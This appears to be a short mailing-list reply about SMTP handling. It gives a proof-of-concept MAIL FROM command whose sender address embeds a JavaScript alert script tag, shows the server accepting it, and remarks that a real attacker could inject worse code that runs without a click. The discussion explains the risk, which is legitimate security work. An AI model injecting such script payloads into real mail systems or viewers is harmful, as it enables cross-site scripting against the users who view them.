@ lbutlr:
> On 12/3/16 2:57 PM, Wietse Venema wrote:
> > Proof of concept:
> >
> > MAIL FROM<"<script
> > type='text/javascript'>alert('xss');</script>"@example.com>
>
> That result in "501 5.5.4 Syntax: MAIL FROM:<address>"
OK, so insert a the missing ':'
MAIL FROM:"<script type='text/javascript'>alert('xss');</script>"@example.com>
250 2.1.0 Ok
Instead of an alert, a real attacker would provide more nefarious
code. This code runs without the user even having to click a link.
Wietse
